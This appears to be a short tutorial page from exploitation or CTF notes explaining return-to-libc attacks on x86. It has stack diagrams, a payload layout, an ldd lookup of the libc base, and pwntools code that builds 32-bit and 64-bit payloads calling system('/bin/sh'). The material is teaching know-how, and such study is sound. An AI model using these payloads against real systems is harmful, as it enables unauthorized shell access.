Ret2LibC
Ret2libc, short for "return-to-libc," is a type of attack that allows an attacker to execute arbitrary code in a program by redirecting the program's execution flow to a function in the libc shared library.
How it works ?
The main idea is to make a simulate a valid call to the system() function by arranging the stack correctly so that the system() function launches a shell.
The execution of this technique may vary depending on the instruction set architecture and the calling convention used. In this article, the x86 standard calling convention will be used as an example.
As explained here, A validsystem()
call will push the address of the parameter onto the stack followed by the return address ( saved EIP ) :
address | values
------------+-------------------------------------------------------------------
| +---------------------- stack frame -------------------------+
| | +-saved eip -+ +-- param ---+ |
0xffffd274: | | | 0x565561dd | | 0xffffd35c | 0x00000002 0x00000001 |
| | +------------+ +------------+ |
0xffffd284: | | 0xffffd354 0xffffd35c 0x00000000 0xffffd2b0 |
0xffffd294: | | 0xffffd354 0xffffd35c 0x00000000 0xffffd2b0 |
... | ...
When a function ends and calls the RET
instruction, it is actually a POP EIP
that is performed, followed by a JMP EIP
. The POP EIP
takes the value that is on top of the stack and stores it in the EIP
register. Since this value is controled (using a Buffer overflow or format string exploit for example), the JMP EIP
is controled.
So, there is the stack state after a buffer overflow in order to return to the system
function with a valid call :
address | values
------------+-------------------------------------------------------------------
| +------------------------- Buffer ---------------------------+
0xffffd264: | | 0x41414141 0x41414141 0x41414141 0x41414141 |
| +------------------------------------------------------------+
| +system addr-+ +-saved eip -+ +--- param --+ |
0xffffd274: | | 0x565561dd | | 0xffffd35c | | 0xffffd12c | 0x00000001 |
| +------------+ +------------+ +------------+ |
... | ...
In order to make the stack in this state, the following payload must be used :
[buffer overflow needed lenght][system() address][any 4 bytes][parameter address]
Getting libc
base address
libc
base address$ ldd chall
linux-gate.so.1 (0xf7f64000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7d51000)
/lib/ld-linux.so.2 (0xf7f66000)
If the ASLR is enable, this will not work and the libc address must be leak.
Getting the "/bin/sh
" and "system()
" addresses
/bin/sh
" and "system()
" addressesUsing pwntools, it's easy to retrieve theses addresses till the libc version and base address are known :
from pwn import *
# Load the binary file and start the process
elf = context.binary = ELF('./chall')
p = process()
# Load the libc library and set its base address
libc = elf.libc
libc.address = 0xf7dc2000
# Get the address of the system function in the libc library
system = libc.sym['system']
# Search for the '/bin/sh' string in the libc library and get its address
binsh = next(libc.search(b'/bin/sh'))
Payload
# 32-bits
payload = flat(
b'A' * offset,
p32(system),
p32(elf.sym['main']),
p32(binsh)
)
# 64-bits
payload = flat(
b'A' * offset,
p64(POP_RDI_GADGET),
p64(binsh),
p64(system),
p64(elf.sym['main'])
)
Resources
Last updated